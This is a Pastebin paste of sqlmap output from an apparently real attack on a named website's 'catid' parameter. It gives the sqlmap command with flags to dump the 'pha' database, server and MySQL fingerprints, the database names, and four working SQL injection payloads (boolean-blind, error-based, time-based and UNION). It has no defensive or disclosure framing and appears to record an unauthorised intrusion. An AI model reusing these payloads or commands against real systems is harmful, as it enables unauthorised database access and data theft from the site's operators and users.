Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- http://www.pha.org.pk/sro_list.php?catid=1 --level=3 --risk=3 --threads=3 --random-agent -D pha --dump
- webserver operating system: Windows 8.1 or 2012 R2
- web application technology: PHP, Microsoft IIS 8.5, PHP 5.3.26
- back-end DBMS: MySQL >= 5.0
- available databases [2]:
- [*] information_schema
- [*] pha
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: catid (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: catid=1 AND 7248=7248
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- Payload: catid=1 AND (SELECT 1706 FROM(SELECT COUNT(*),CONCAT(0x71716a6b71,(SELECT (ELT(1706=1706,1))),0x7170766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
- Type: time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
- Payload: catid=1 AND (SELECT 9243 FROM (SELECT(SLEEP(5)))tCuT)
- Type: UNION query
- Title: Generic UNION query (NULL) - 5 columns
- Payload: catid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71716a6b71,0x7a754a6e494b4f484c6f44477a4b7669614367734e556676756f576a617058694b4c72496f72536f,0x7170766271),NULL,NULL-- -
- ---
- web server operating system: Windows 2012 R2 or 8.1
- web application technology: PHP 5.3.26, Microsoft IIS 8.5, PHP
- back-end DBMS: MySQL >= 5.0
- Database: pha
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
